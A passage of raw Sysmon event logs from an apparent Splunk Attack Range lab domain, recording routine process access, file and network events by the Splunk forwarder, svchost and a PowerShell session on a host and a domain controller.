Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57395-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x80000000000000001052616Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:20.612{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51172-false10.0.1.12-8000- 23542300x80000000000000001052615Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:28.200{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B35E07C534B218CF35F4ED7BBE4E5E8A,SHA256=370F36183AF3A8C49896EBA969293528E34ADB5C79C878C04E458C4C81295DDB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000809456Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:28.427{0C1E0330-F714-60EB-BF79-00000000D001}35522396C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809455Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:28.255{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F714-60EB-BF79-00000000D001}3552C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809454Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:28.255{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809453Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:28.255{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809452Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:28.255{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809451Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:28.255{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809450Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:28.255{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809449Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:28.255{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809448Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:28.255{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809447Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:28.255{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809446Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:28.255{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809445Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:28.255{0C1E0330-048F-60E8-0500-00000000D001}412528C:\Windows\system32\csrss.exe{0C1E0330-F714-60EB-BF79-00000000D001}3552C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000809444Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:28.255{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F714-60EB-BF79-00000000D001}3552C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000809443Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:28.240{0C1E0330-F714-60EB-BF79-00000000D001}3552C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000809442Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:28.005{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=39CEA89668FE1D5778A67C99566CEF1A,SHA256=F85CA48B56BA124A147A8BF6F109701B92E4AF577D04E6614E2EC093435D40E9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809441Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:28.005{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=85E9333A9384C8772F04158332B563EC,SHA256=FDC7799E8ED8C67309D0F5E830128CBC1B576C9A8A0CFFE61F3D4925D39E957F,IMPHASH=00000000000000000000000000000000falsetrue 17141700x80000000000000001052661Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-CreatePipe2021-07-12 08:02:29.961{466BC892-F715-60EB-B77D-00000000CF01}4796\PSHost.132705505495880043.4796.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x80000000000000001052660Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:29.930{466BC892-F715-60EB-B77D-00000000CF01}4796ATTACKRANGE\bobC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\bob\AppData\Local\Temp\3\__PSScriptPolicyTest_nqit3m51.fdv.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052659Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:29.930{466BC892-F715-60EB-B77D-00000000CF01}4796ATTACKRANGE\bobC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\bob\AppData\Local\Temp\3\__PSScriptPolicyTest_cm210yaz.oef.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001052658Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:29.899{466BC892-F715-60EB-B77D-00000000CF01}4796C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\bob\AppData\Local\Temp\3\__PSScriptPolicyTest_cm210yaz.oef.ps12021-07-12 08:02:29.899 10341000x80000000000000001052657Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:29.861{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-F715-60EB-B77D-00000000CF01}4796C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052656Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:29.830{466BC892-F715-60EB-B77D-00000000CF01}47964956C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+1549f7|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052655Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:29.830{466BC892-F715-60EB-B77D-00000000CF01}47964956C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+154962|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052654Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:29.830{466BC892-F715-60EB-B77D-00000000CF01}47964956C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+154947|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052653Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:29.830{466BC892-F715-60EB-B77D-00000000CF01}47964956C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+154947|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052652Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:29.830{466BC892-F715-60EB-B77D-00000000CF01}47964956C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\windows.storage.dll+609de|C:\Windows\System32\windows.storage.dll+15427c|C:\Windows\System32\windows.storage.dll+154058|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052651Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:29.830{466BC892-F715-60EB-B77D-00000000CF01}47964956C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+609cc|C:\Windows\System32\windows.storage.dll+15427c|C:\Windows\System32\windows.storage.dll+154058|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052650Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:29.830{466BC892-F715-60EB-B77D-00000000CF01}47964956C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+609cc|C:\Windows\System32\windows.storage.dll+15427c|C:\Windows\System32\windows.storage.dll+154058|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001052649Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 